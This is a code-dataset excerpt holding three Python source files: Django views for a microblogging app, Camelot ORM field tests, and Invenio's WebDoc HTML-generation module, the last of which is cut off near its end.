code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
---|---|---|---|---|---|
# -*- coding: utf-8 -*-
import re
from django.shortcuts import render_to_response, get_object_or_404
from django.http import HttpResponse
from django.template.loader import render_to_string
from django.template import RequestContext
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import ensure_csrf_cookie
from django.conf import settings
from django.utils.html import escape
from django.utils.translation import ugettext as _
from django.utils.translation import get_language
from dwitter.main.models import Member, Dwit, DPF
from dwitter.main.tasks import celery_dwitsaved, celery_follow, celery_unfollow
from dwitter.main.forms import MemberForm, SearchForm
from django.utils import translation
@login_required
@ensure_csrf_cookie
def home(request):
if not request.session.get('django_language', None):
request.session['django_language'] = get_language()
me = request.user.member
following = me.following.all().count()
followers = me.followers.all().count()
nodwits = Dwit.objects.filter(member=me).count()
context_vars={'me':me,'following':following,'followers':followers,'nodwits':nodwits,'navbar':'home'}
if request.GET.get('tag'):
context_vars.update({'tag':request.GET['tag']})
template_name='home.html'
context = RequestContext(request)
return render_to_response(template_name,context_vars,context_instance=context)
@login_required
def getflow(request, nfd):
nod = settings.NUMBER_OF_DWITS
context_vars = {}
if request.GET.get('tag'):
dwits = Dwit.objects.filter(tags__name=request.GET.get('tag'))[int(nfd):int(nfd)+int(nod)]
elif request.GET.get('username'):
me = get_object_or_404(Member, user__username=request.GET['username'])
dwits = Dwit.objects.filter(member = me)[int(nfd):int(nfd)+int(nod)]
context_vars.update({'profile':True})
elif request.GET.get('hash'):
form = SearchForm(request.GET)
if form.is_valid():
if form.cleaned_data.get('hash'):
hashes = form.cleaned_data['hash']
hashes = hashes.replace(',','')
hashes_array = hashes.split()
dwits = Dwit.objects.filter(tags__name__in=hashes_array).distinct()[int(nfd):int(nfd)+int(nod)]
context_vars.update({'search':True})
else:
me = request.user.member
dwitspf = DPF.objects.filter(member = me)[int(nfd):int(nfd)+int(nod)]
dwits=[]
for dwitpf in dwitspf:
dwits.append(dwitpf.dwit)
for dwit in dwits:
dwit.content = re.subn('(?P<tag>(?<= #)\w+)','<a href="/main/home/?tag=\g<tag>" class="label label-info vmiddle" rel="nofollow" title="\g<tag>">#\g<tag></a>',dwit.content)[0].replace("#<","<")
template_name='flow.html'
context_vars.update({'dwits':dwits})
if len(dwits) == nod:
context_vars.update({'nfd':int(nfd)+nod})
context = RequestContext(request)
return render_to_response(template_name,context_vars,context_instance=context)
@login_required
def gettags(request):
notags = settings.NUMBER_OF_TAGS
tags = Dwit.tags.most_common()[0:notags]
context_vars={'tags':tags}
template_name='tags.html'
context = RequestContext(request)
return render_to_response(template_name,context_vars,context_instance=context)
@login_required
def dwit(request):
if request.method != 'POST':
response = HttpResponse(mimetype="text/html")
response['content-type']="text/html; charset=UTF-8"
response.write(u"POST only!.")
return response
me = request.user.member
if request.POST.get('dwit'):
content = escape(request.POST['dwit'])
direct = False
if re.match('^\@\w+',content):
try:
Member.objects.get(user__username=re.match('^\@\w+',content).group(0)[1:])
direct = True
except Member.DoesNotExist:
response = HttpResponse(mimetype="application/json")
response.write(u'{"status":"error","message":"'+_('No sush user.')+'"}')
return response
tags = re.findall(r' #\w+',content)
try:
replyto = Dwit.objects.get(pk = request.POST.get('dwitid',None))
except Dwit.DoesNotExist:
replyto = None
dwit = Dwit.objects.create(member = me, content = content, replyto = replyto, direct=direct)
for tag in tags:
dwit.tags.add(tag[2:])
rendered = render_to_string('flow.html',{'dwits':[dwit]})
celery_dwitsaved.delay(dwit, rendered)
elif request.POST.get('dwitid'):
dwit = get_object_or_404(Dwit, pk=request.POST['dwitid'])
newdwit = Dwit.objects.create(member = me, content = dwit.content, redwit = dwit.member)
if dwit.tags:
tags = dwit.tags.all()
newdwit.tags.add(*tags)
rendered = render_to_string('flow.html',{'dwits':[newdwit]})
celery_dwitsaved.delay(newdwit, rendered)
response = HttpResponse(mimetype="application/json")
response.write('{"status":"success","message":"'+_('Dwit published.')+'"}')
return response
@login_required
@ensure_csrf_cookie
def profile(request,username):
m = get_object_or_404(Member, user__username=username)
nodwits = Dwit.objects.filter(member=m).count()
fing = m.following.all()
following = len(fing)
if request.user.username != username:
me = request.user.member
me_fing = me.following.all()
if m in me_fing:
action = 'unfollow'
else:
action = 'follow'
else:
action = None
fers = m.followers.all()
followers = len(fers)
context_vars={'m':m,'fing':fing,'fers':fers,'action':action,'nodwits':nodwits,'following':following,'followers':followers,'navbar':'profile'}
if not action:
if request.method == 'POST':
form = MemberForm(request.POST, request.FILES, instance=m)
if form.is_valid():
if request.LANGUAGE_CODE != form.cleaned_data['language']:
request.session['django_language'] = form.cleaned_data['language']
translation.activate(form.cleaned_data['language'])
form.save()
context_vars.update({'success':_('Changes saved'),'form':form,'current_lang':m.language})
else:
ferrors = ''
for field in form:
if field.errors:
ferrors += '<b>'+field.label+'</b>: '
for error in field.errors:
ferrors += error+'<br />'
context_vars.update({'ferrors':ferrors,'form':form,'current_lang':m.language})
else:
form = MemberForm(instance=m)
context_vars.update({'form':form,'current_lang':m.language})
template_name='profile.html'
context = RequestContext(request)
return render_to_response(template_name,context_vars,context_instance=context)
@login_required
def follow(request, username):
m = get_object_or_404(Member, user__username=username)
me = request.user.member
me.following.add(m)
celery_follow.delay(me, m)
response = HttpResponse(mimetype="text/html")
response['content-type']="text/html; charset=UTF-8"
response.write(_('You follow %s') % username)
return response
@login_required
def unfollow(request, username):
m = get_object_or_404(Member, user__username=username)
me = request.user.member
me.following.remove(m)
celery_unfollow.delay(me,m)
response = HttpResponse(mimetype="text/html")
response['content-type']="text/html; charset=UTF-8"
response.write(_('You stopped following %s') % username)
return response
@login_required
def search(request):
form = SearchForm()
context_vars={'form':form,'navbar':'search'}
template_name='search.html'
context = RequestContext(request)
return render_to_response(template_name,context_vars,context_instance=context)
@login_required
def getdwit(request,dwit):
d = get_object_or_404(Dwit, pk=dwit)
template_name='redwit.html'
context = RequestContext(request)
return render_to_response(template_name,{'dwit':d},context_instance=context)
@login_required
def getreplyto(request,dwit):
d = get_object_or_404(Dwit, pk=dwit)
template_name='replyto.html'
context = RequestContext(request)
return render_to_response(template_name,{'dwit':d},context_instance=context)
| sv1jsb/dwitter | dwitter/main/views.py | Python | bsd-3-clause | 8,546 |
"""
test the different syntaxes to define fields
"""
from . import TestMetaData
from camelot.core.orm import Field, has_field
from sqlalchemy.types import String
class TestFields( TestMetaData ):
def test_attr_syntax(self):
class Person(self.Entity):
firstname = Field(String(30))
surname = Field(String(30))
self.create_all()
self.session.begin()
Person(firstname="Homer", surname="Simpson")
Person(firstname="Bart", surname="Simpson")
self.session.commit()
self.session.expunge_all()
p = Person.get_by(firstname="Homer")
assert p.surname == 'Simpson'
def test_has_field(self):
class Person(self.Entity):
has_field('firstname', String(30))
has_field('surname', String(30))
self.create_all()
self.session.begin()
Person(firstname="Homer", surname="Simpson")
Person(firstname="Bart", surname="Simpson")
self.session.commit()
self.session.expunge_all()
p = Person.get_by(firstname="Homer")
assert p.surname == 'Simpson'
| jeroendierckx/Camelot | test/test_orm/test_fields.py | Python | gpl-2.0 | 1,169 |
# -*- coding: utf-8 -*-
## This file is part of Invenio.
## Copyright (C) 2007, 2008, 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
WebDoc -- Transform webdoc sources into static html files
"""
__revision__ = \
"$Id$"
from invenio.config import \
CFG_PREFIX, \
CFG_SITE_LANG, \
CFG_SITE_LANGS, \
CFG_SITE_NAME, \
CFG_SITE_SUPPORT_EMAIL, \
CFG_SITE_ADMIN_EMAIL, \
CFG_SITE_URL, \
CFG_SITE_SECURE_URL, \
CFG_VERSION, \
CFG_SITE_NAME_INTL, \
CFG_CACHEDIR
from invenio.dateutils import \
convert_datestruct_to_datetext, \
convert_datestruct_to_dategui, \
convert_datecvs_to_datestruct
from invenio.messages import \
gettext_set_language, \
wash_language, \
language_list_long
import re
import getopt
import os
import sys
import time
# List of (webdoc_source_dir, webdoc_cache_dir)
webdoc_dirs = {'help':('%s/lib/webdoc/invenio/help' % CFG_PREFIX, \
'%s/webdoc/help-pages' % CFG_CACHEDIR),
'admin':('%s/lib/webdoc/invenio/admin' % CFG_PREFIX, \
'%s/webdoc/admin-pages' % CFG_CACHEDIR),
'hacking':('%s/lib/webdoc/invenio/hacking' % CFG_PREFIX, \
'%s/webdoc/hacking-pages' % CFG_CACHEDIR)}
# Regular expression for finding text to be translated
translation_pattern = re.compile(r'_\((?P<word>.*?)\)_', \
re.IGNORECASE | re.DOTALL | re.VERBOSE)
# # Regular expression for finding comments
comments_pattern = re.compile(r'^\s*#.*$', \
re.MULTILINE)
# Regular expression for finding <lang:current/> tag
pattern_lang_current = re.compile(r'<lang \s*:\s*current\s*\s*/>', \
re.IGNORECASE | re.DOTALL | re.VERBOSE)
# Regular expression for finding <lang:link/> tag
pattern_lang_link_current = re.compile(r'<lang \s*:\s*link\s*\s*/>', \
re.IGNORECASE | re.DOTALL | re.VERBOSE)
# Regular expression for finding <!-- %s: %s --> tag
# where %s will be replaced at run time
pattern_tag = r'''
<!--\s*(?P<tag>%s) #<!-- %%s tag (no matter case)
\s*:\s*
(?P<value>.*?) #description value. any char that is not end tag
(\s*-->) #end tag
'''
# List of available tags in webdoc, and the pattern to find it
pattern_tags = {'WebDoc-Page-Title': '',
'WebDoc-Page-Navtrail': '',
'WebDoc-Page-Description': '',
'WebDoc-Page-Keywords': '',
'WebDoc-Page-Header-Add': '',
'WebDoc-Page-Box-Left-Top-Add': '',
'WebDoc-Page-Box-Left-Bottom-Add': '',
'WebDoc-Page-Box-Right-Top-Add': '',
'WebDoc-Page-Box-Right-Bottom-Add': '',
'WebDoc-Page-Footer-Add': '',
'WebDoc-Page-Revision': ''
}
for tag in pattern_tags.keys():
pattern_tags[tag] = re.compile(pattern_tag % tag, \
re.IGNORECASE | re.DOTALL | re.VERBOSE)
# Regular expression for finding <lang>...</lang> tag
pattern_lang = re.compile(r'''
<lang #<lang tag (no matter case)
\s*
(?P<keep>keep=all)*
\s* #any number of white spaces
> #closing <lang> start tag
(?P<langs>.*?) #anything but the next group (greedy)
(</lang\s*>) #end tag
''', re.IGNORECASE | re.DOTALL | re.VERBOSE)
# Regular expression for finding <en>...</en> tag (particular case of
# pattern_lang)
pattern_CFG_SITE_LANG = re.compile(r"<("+CFG_SITE_LANG+ \
r")\s*>(.*?)(</"+CFG_SITE_LANG+r"\s*>)",
re.IGNORECASE | re.DOTALL)
# Builds regular expression for finding each known language in <lang> tags
ln_pattern_text = r"<(?P<lang>"
ln_pattern_text += r"|".join([lang[0] for lang in \
language_list_long(enabled_langs_only=False)])
ln_pattern_text += r')\s*(revision="[^"]"\s*)?>(?P<translation>.*?)</\1>'
ln_pattern = re.compile(ln_pattern_text, re.IGNORECASE | re.DOTALL)
defined_tags = {'<CFG_SITE_NAME>': CFG_SITE_NAME,
'<CFG_SITE_SUPPORT_EMAIL>': CFG_SITE_SUPPORT_EMAIL,
'<CFG_SITE_ADMIN_EMAIL>': CFG_SITE_ADMIN_EMAIL,
'<CFG_SITE_URL>': CFG_SITE_URL,
'<CFG_SITE_SECURE_URL>': CFG_SITE_SECURE_URL,
'<CFG_VERSION>': CFG_VERSION,
'<CFG_SITE_NAME_INTL>': CFG_SITE_NAME_INTL}
def get_webdoc_parts(webdoc,
parts=['title', \
'keywords', \
'navtrail', \
'body',
'lastupdated',
'description'],
categ="",
update_cache_mode=1,
ln=CFG_SITE_LANG,
verbose=0):
"""
Returns the html of the specified 'webdoc' part(s).
Also update the cache if 'update_cache' is True.
Parameters:
webdoc - *string* the name of a webdoc that can be
found in standard webdoc dir, or a webdoc
filepath. Priority is given to filepath if
both match.
parts - *list(string)* the parts that should be
returned by this function. Can be in:
'title', 'keywords', 'navtrail', 'body',
'description', 'lastupdated'.
categ - *string* (optional) The category to which
the webdoc file belongs. 'help', 'admin'
or 'hacking'. If "", look in all categories.
update_cache_mode - *int* update the cached version of the
given 'webdoc':
- 0 : do not update
- 1 : update if needed
- 2 : always update
Returns : *dictionary* with keys being in 'parts' input parameter and values
being the corresponding html part.
"""
html_parts = {}
if update_cache_mode in [1, 2]:
update_webdoc_cache(webdoc, update_cache_mode, verbose)
def get_webdoc_cached_part_path(webdoc_cache_dir, webdoc, ln, part):
"Build path for given webdoc, ln and part"
return webdoc_cache_dir + os.sep + webdoc + \
os.sep + webdoc + '.' + part + '-' + \
ln + '.html'
for part in parts:
if categ != "":
locations = [webdoc_dirs.get(categ, ('',''))]
else:
locations = webdoc_dirs.values()
for (_webdoc_source_dir, _web_doc_cache_dir) in locations:
webdoc_cached_part_path = None
if os.path.exists(get_webdoc_cached_part_path(_web_doc_cache_dir,
webdoc, ln, part)):
# Check given language
webdoc_cached_part_path = get_webdoc_cached_part_path(_web_doc_cache_dir, webdoc, ln, part)
elif os.path.exists(get_webdoc_cached_part_path(_web_doc_cache_dir, webdoc, CFG_SITE_LANG, part)):
# Check CFG_SITE_LANG
webdoc_cached_part_path = get_webdoc_cached_part_path(_web_doc_cache_dir, webdoc, CFG_SITE_LANG, part)
elif os.path.exists(get_webdoc_cached_part_path(_web_doc_cache_dir, webdoc, 'en', part)):
# Check English
webdoc_cached_part_path = get_webdoc_cached_part_path(_web_doc_cache_dir, webdoc, 'en', part)
if webdoc_cached_part_path is not None:
try:
webdoc_cached_part = file(webdoc_cached_part_path, 'r').read()
html_parts[part] = webdoc_cached_part
except IOError:
# Could not read cache file. Generate on-the-fly,
# get all the parts at the same time, and return
(webdoc_source_path, \
webdoc_cache_dir, \
webdoc_name,\
webdoc_source_modification_date, \
webdoc_cache_modification_date) = get_webdoc_info(webdoc)
webdoc_source = file(webdoc_source_path, 'r').read()
htmls = transform(webdoc_source, languages=[ln])
if len(htmls) > 0:
(lang, body, title, keywords, \
navtrail, lastupdated, description) = htmls[-1]
html_parts = {'body': body or '',
'title': title or '',
'keywords': keywords or '',
'navtrail': navtrail or '',
'lastupdated': lastupdated or '',
'description': description or ''}
# We then have all the parts, or there is no
# translation for this file (if len(htmls)==0)
break
else:
# Look in other categories
continue
if html_parts == {}:
# Could not find/read the folder where cache should
# be. Generate on-the-fly, get all the parts at the
# same time, and return
(webdoc_source_path, \
webdoc_cache_dir, \
webdoc_name,\
webdoc_source_modification_date, \
webdoc_cache_modification_date) = get_webdoc_info(webdoc)
if webdoc_source_path is not None:
try:
webdoc_source = file(webdoc_source_path, 'r').read()
htmls = transform(webdoc_source, languages=[ln])
if len(htmls) > 0:
(lang, body, title, keywords, \
navtrail, lastupdated, description) = htmls[-1]
html_parts = {'body': body or '',
'title': title or '',
'keywords': keywords or '',
'navtrail': navtrail or '',
'lastupdated': lastupdated or '',
'description': description or ''}
# We then have all the parts, or there is no
# translation for this file (if len(htmls)==0)
break
except IOError:
# Nothing we can do..
pass
return html_parts
def update_webdoc_cache(webdoc, mode=1, verbose=0, languages=CFG_SITE_LANGS):
"""
Update the cache (on disk) of the given webdoc.
Parameters:
webdoc - *string* the name of a webdoc that can be
found in standard webdoc dir, or a webdoc
filepath.
mode - *int* update cache mode:
- 0 : do not update
- 1 : only if necessary (webdoc source
is newer than its cache)
- 2 : always update
"""
if mode in [1, 2]:
(webdoc_source_path, \
webdoc_cache_dir, \
webdoc_name,\
webdoc_source_modification_date, \
webdoc_cache_modification_date) = get_webdoc_info(webdoc)
if mode == 1 and \
webdoc_source_modification_date < webdoc_cache_modification_date and \
get_mo_last_modification() < webdoc_cache_modification_date:
# Cache was updated after source. No need to update
return
(webdoc_source, \
webdoc_cache_dir, \
webdoc_name) = read_webdoc_source(webdoc)
if webdoc_source is not None:
htmls = transform(webdoc_source, languages=languages)
for (lang, body, title, keywords, \
navtrail, lastupdated, description) in htmls:
# Body
if body is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.body%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
body,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Title
if title is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.title%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
title,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Keywords
if keywords is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.keywords%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
keywords,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Navtrail
if navtrail is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.navtrail%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
navtrail,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Description
if description is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.description%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
description,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Last updated timestamp (CVS timestamp)
if lastupdated is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.lastupdated%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
lastupdated,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Last updated cache file
try:
write_cache_file('last_updated',
webdoc_cache_dir,
convert_datestruct_to_dategui(time.localtime()),
verbose=0)
except IOError, e:
print e
except OSError, e:
print e
if verbose > 0:
print 'Written cache in %s' % webdoc_cache_dir
def read_webdoc_source(webdoc):
"""
Returns the source of the given webdoc, along with the path to its
cache directory.
Returns (None, None, None) if webdoc cannot be found.
Parameters:
webdoc - *string* the name of a webdoc that can be
found in standard webdoc dir, or a webdoc
filepath. Priority is given to filepath if
both match.
Returns: *tuple* (webdoc_source, webdoc_cache_dir, webdoc_name)
"""
(webdoc_source_path, \
webdoc_cache_dir, \
webdoc_name,\
webdoc_source_modification_date, \
webdoc_cache_modification_date) = get_webdoc_info(webdoc)
if webdoc_source_path is not None:
try:
webdoc_source = file(webdoc_source_path, 'r').read()
except IOError:
webdoc_source = None
else:
webdoc_source = None
return (webdoc_source, webdoc_cache_dir, webdoc_name)
def get_webdoc_info(webdoc):
"""
Locate the file corresponding to given webdoc and return its
path, the path to its cache directory (even if it does not exist
yet), the last modification dates of the source and the cache, and
the webdoc name (i.e. webdoc id)
Parameters:
webdoc - *string* the name of a webdoc that can be found in
standard webdoc dirs. (Without extension '.webdoc',
hence 'search-guide', not'search-guide.webdoc'.)
Returns: *tuple* (webdoc_source_path, webdoc_cache_dir,
webdoc_name webdoc_source_modification_date,
webdoc_cache_modification_date)
"""
webdoc_source_path = None
webdoc_cache_dir = None
webdoc_name = None
last_updated_date = None
webdoc_source_modification_date = 1
webdoc_cache_modification_date = 0
for (_webdoc_source_dir, _web_doc_cache_dir) in webdoc_dirs.values():
webdoc_source_path = _webdoc_source_dir + os.sep + \
webdoc + '.webdoc'
if os.path.exists(webdoc_source_path):
webdoc_cache_dir = _web_doc_cache_dir + os.sep + webdoc
webdoc_name = webdoc
webdoc_source_modification_date = os.stat(webdoc_source_path).st_mtime
break
else:
webdoc_source_path = None
webdoc_name = None
webdoc_source_modification_date = 1
if webdoc_cache_dir is not None and \
os.path.exists(webdoc_cache_dir + os.sep + 'last_updated'):
webdoc_cache_modification_date = os.stat(webdoc_cache_dir + \
os.sep + \
'last_updated').st_mtime
return (webdoc_source_path, webdoc_cache_dir, webdoc_name,
webdoc_source_modification_date, webdoc_cache_modification_date)
def get_webdoc_topics(sort_by='name', sc=0, limit=-1,
categ=['help', 'admin', 'hacking'],
ln=CFG_SITE_LANG):
"""
List the available webdoc files in html format.
sort_by - *string* Sort topics by 'name' or 'date'.
sc - *int* Split the topics by categories if sc=1.
limit - *int* Max number of topics to be printed.
No limit if limit < 0.
categ - *list(string)* the categories to consider
ln - *string* Language of the page
"""
_ = gettext_set_language(ln)
topics = {}
ln_link = (ln != CFG_SITE_LANG and '?ln=' + ln) or ''
for category in categ:
if not webdoc_dirs.has_key(category):
continue
(source_path, cache_path) = webdoc_dirs[category]
if not topics.has_key(category):
topics[category] = []
# Build list of tuples(webdoc_name, webdoc_date, webdoc_url)
for webdocfile in [path for path in \
os.listdir(source_path) \
if path.endswith('.webdoc')]:
webdoc_name = webdocfile[:-7]
webdoc_url = CFG_SITE_URL + "/help/" + \
((category != 'help' and category + '/') or '') + \
webdoc_name
try:
webdoc_date = time.strptime(get_webdoc_parts(webdoc_name,
parts=['lastupdated']).get('lastupdated', "1970-01-01 00:00:00"),
"%Y-%m-%d %H:%M:%S")
except:
webdoc_date = time.strptime("1970-01-01 00:00:00", "%Y-%m-%d %H:%M:%S")
topics[category].append((webdoc_name, webdoc_date, webdoc_url))
# If not split by category, merge everything
if sc == 0:
all_topics = []
for topic in topics.values():
all_topics.extend(topic)
topics.clear()
topics[''] = all_topics
# Sort topics
if sort_by == 'name':
for topic in topics.values():
topic.sort()
elif sort_by == 'date':
for topic in topics.values():
topic.sort(lambda x, y:cmp(x[1], y[1]))
topic.reverse()
out = ''
for category, topic in topics.iteritems():
if category != '' and len(categ) > 1:
out += '<strong>'+ _("%(category)s Pages") % \
{'category': _(category).capitalize()} + '</strong>'
if limit < 0:
limit = len(topic)
out += '<ul><li>' + \
'</li><li>'.join(['%s <a href="%s%s">%s</a>' % \
((sort_by == 'date' and time.strftime('%Y-%m-%d', topic_item[1])) or '', \
topic_item[2], \
ln_link, \
get_webdoc_parts(topic_item[0], \
parts=['title'], \
ln=ln).get('title', '')) \
for topic_item in topic[:limit]]) + \
'</li></ul>'
return out
def transform(webdoc_source, verbose=0, req=None, languages=CFG_SITE_LANGS):
"""
Transform a WebDoc into html
This is made through a serie of transformations, mainly substitutions.
Parameters:
- webdoc_source : *string* the WebDoc input to transform to HTML
"""
parameters = {} # Will store values for specified parameters, such
# as 'Title' for <!-- WebDoc-Page-Title: Title -->
def get_param_and_remove(match):
"""
Analyses 'match', get the parameter and return empty string to
remove it.
Called by substitution in 'transform(...)', used to collection
parameters such as <!-- WebDoc-Page-Title: Title -->
@param match: a match object corresponding to the special tag
that must be interpreted
"""
tag = match.group("tag")
value = match.group("value")
parameters[tag] = value
return ''
def translate(match):
"""
Translate matching values
"""
word = match.group("word")
translated_word = _(word)
return translated_word
# 1 step
## First filter, used to remove comments
## and <protect> tags
uncommented_webdoc = ''
for line in webdoc_source.splitlines(True):
if not line.strip().startswith('#'):
uncommented_webdoc += line
webdoc_source = uncommented_webdoc.replace('<protect>', '')
webdoc_source = webdoc_source.replace('</protect>', '')
html_texts = {}
# Language dependent filters
for ln in languages:
_ = gettext_set_language(ln)
# Check if translation is really needed
## Just a quick check. Might trigger false negative, but it is
## ok.
if ln != CFG_SITE_LANG and \
translation_pattern.search(webdoc_source) is None and \
pattern_lang_link_current.search(webdoc_source) is None and \
pattern_lang_current.search(webdoc_source) is None and \
'<%s>' % ln not in webdoc_source and \
('_(') not in webdoc_source:
continue
# 2 step
## Filter used to translate string in _(..)_
localized_webdoc = translation_pattern.sub(translate, webdoc_source)
# 3 step
## Print current language 'en', 'fr', .. instead of
## <lang:current /> tags and '?ln=en', '?ln=fr', .. instead of
## <lang:link /> if ln is not default language
if ln != CFG_SITE_LANG:
localized_webdoc = pattern_lang_link_current.sub('?ln=' + ln,
localized_webdoc)
else:
localized_webdoc = pattern_lang_link_current.sub('',
localized_webdoc)
localized_webdoc = pattern_lang_current.sub(ln, localized_webdoc)
# 4 step
## Filter out languages
localized_webdoc = filter_languages(localized_webdoc, ln, defined_tags)
# 5 Step
## Replace defined tags with their value from config file
## Eg. replace <CFG_SITE_URL> with 'http://cdsweb.cern.ch/':
for defined_tag, value in defined_tags.iteritems():
if defined_tag.upper() == '<CFG_SITE_NAME_INTL>':
localized_webdoc = localized_webdoc.replace(defined_tag, \
value.get(ln, value['en']))
else:
localized_webdoc = localized_webdoc.replace(defined_tag, value)
# 6 step
## Get the parameters defined in HTML comments, like
## <!-- WebDoc-Page-Title: My Title -->
localized_body = localized_webdoc
for tag, pattern in pattern_tags.iteritems():
localized_body = pattern.sub(get_param_and_remove, localized_body)
out = localized_body
# Pre-process date
last_updated = parameters.get('WebDoc-Page-Revision', '')
last_updated = convert_datecvs_to_datestruct(last_updated)
last_updated = convert_datestruct_to_datetext(last_updated)
html_texts[ln] = (ln,
out,
parameters.get('WebDoc-Page-Title'),
parameters.get('WebDoc-Page-Keywords'),
parameters.get('WebDoc-Page-Navtrail'),
last_updated,
parameters.get('WebDoc-Page-Description'))
# Remove duplicates
filtered_html_texts = []
if html_texts.has_key(CFG_SITE_LANG):
filtered_html_texts = [(html_text[0], \
(html_text[1] != html_texts[CFG_SITE_LANG][1] and html_text[1]) or None, \
(html_text[2] != html_texts[CFG_SITE_LANG][2] and html_text[2]) or None, \
(html_text[3] != html_texts[CFG_SITE_LANG][3] and html_text[3]) or None, \
(html_text[4] != html_texts[CFG_SITE_LANG][4] and html_text[4]) or None, \
(html_text[5] != html_texts[CFG_SITE_LANG][5] and html_text[5]) or None, \
(html_text[6] != html_texts[CFG_SITE_LANG][6] and html_text[6]) or None)
for html_text in html_texts.values() \
if html_text[0] != CFG_SITE_LANG]
filtered_html_texts.append(html_texts[CFG_SITE_LANG])
else:
filtered_html_texts = html_texts.values()
return filtered_html_texts
def mymkdir(newdir, mode=0777):
"""works the way a good mkdir should :)
- already exists, silently complete
- regular file in the way, raise an exception
- parent directory(ies) does not exist, make them as well
"""
if os.path.isdir(newdir):
pass
elif os.path.isfile(newdir):
raise OSError("a file with the same name as the desired " \
"dir, '%s', already exists." % newdir)
else:
head, tail = os.path.split(newdir)
if head and not os.path.isdir(head):
mymkdir(head, mode)
if tail:
os.umask(022)
os.mkdir(newdir, mode)
def write_cache_file(filename, webdoc_cache_dir, filebody, verbose=0):
"""Write a file inside WebDoc cache dir.
Raise an exception if not possible
"""
# open file:
mymkdir(webdoc_cache_dir)
fullfilename = webdoc_cache_dir + os.sep + filename
if filebody is None:
filebody = ''
os.umask(022)
f = open(fullfilename, "w")
f.write(filebody)
f.close()
if verbose > 2:
print 'Written %s' % fullfilename
def get_mo_last_modification():
"""
Returns the timestamp of the most recently modified mo (compiled
po) file
"""
# Take one of the mo files. They are all installed at the same
# time, so last modication date should be the same
mo_file = '%s/share/locale/%s/LC_MESSAGES/invenio.mo' % (CFG_PREFIX, CFG_SITE_LANG)
if os.path.exists(os.path.abspath(mo_file)):
return os.stat(mo_file).st_mtime
else:
return 0
def filter_languages(text, ln='en', defined_tags=None):
"""
Filters the language tags that do not correspond to the specified language.
Eg: <lang><en>A book</en><de>Ein Buch</de></lang> will return
- with ln = 'de': "Ein Buch"
- with ln = 'en': "A book"
- with ln = 'fr': "A book"
Also replace variables such as <CFG_SITE_URL> and <CFG_SITE_NAME_INTL> inside
<lang><..><..></lang> tags in order to print them with the correct
language
@param text: the input text
@param ln: the language that is NOT filtered out from the input
@return: the input text as string with unnecessary languages filtered out
@see: bibformat_engine.py, from where this function was originally extracted
"""
# First define search_lang_tag(match) and clean_language_tag(match), used
# in re.sub() function
def search_lang_tag(match):
"""
Searches for the <lang>...</lang> tag and remove inner localized tags
such as <en>, <fr>, that are not current_lang.
If current_lang cannot be found inside <lang> ... </lang>, try to use 'CFG_SITE_LANG'
@param match: a match object corresponding to the special tag that must be interpreted
"""
current_lang = ln
# If <lang keep=all> is used, keep all empty line (this is
# currently undocumented and behaviour might change)
keep = False
if match.group("keep") is not None:
keep = True
def clean_language_tag(match):
"""
Return tag text content if tag language of match is output language.
Called by substitution in 'filter_languages(...)'
@param match: a match object corresponding to the special tag that must be interpreted
"""
if match.group('lang') == current_lang or \
keep == True:
return match.group('translation')
else:
return ""
# End of clean_language_tag(..)
lang_tag_content = match.group("langs")
# Try to find tag with current lang. If it does not exists,
# then try to look for CFG_SITE_LANG. If still does not exist, use
# 'en' as current_lang
pattern_current_lang = re.compile(r"<(" + current_lang + \
r")\s*>(.*?)(</"+current_lang+r"\s*>)",
re.IGNORECASE | re.DOTALL)
if re.search(pattern_current_lang, lang_tag_content) is None:
current_lang = CFG_SITE_LANG
# Can we find translation in 'CFG_SITE_LANG'?
if re.search(pattern_CFG_SITE_LANG, lang_tag_content) is None:
current_lang = 'en'
cleaned_lang_tag = ln_pattern.sub(clean_language_tag, lang_tag_content)
# Remove empty lines
# Only if 'keep' has not been set
if keep == False:
stripped_text = ''
for line in cleaned_lang_tag.splitlines(True):
if line.strip():
stripped_text += line
cleaned_lang_tag = stripped_text
return cleaned_lang_tag
# End of search_lang_tag(..)
filtered_text = pattern_lang.sub(search_lang_tag, text)
return filtered_text
def usage(exitcode=1, msg=""):
"""Prints usage info."""
if msg:
sys.stderr.write("Error: %s.\n" % msg)
sys.stderr.write("Usage: %s [options] <webdocname>\n" % sys.argv[0])
sys.stderr.write(" -h, --help \t\t Print this help.\n")
sys.stderr.write(" -V, --version \t\t Print version information.\n")
sys.stderr.write(" -v, --verbose=LEVEL \t\t Verbose level (0=min,1=normal,9=max).\n")
sys.stderr.write(" -l, --language=LN1,LN2,.. \t\t Language(s) to process (default all)\n")
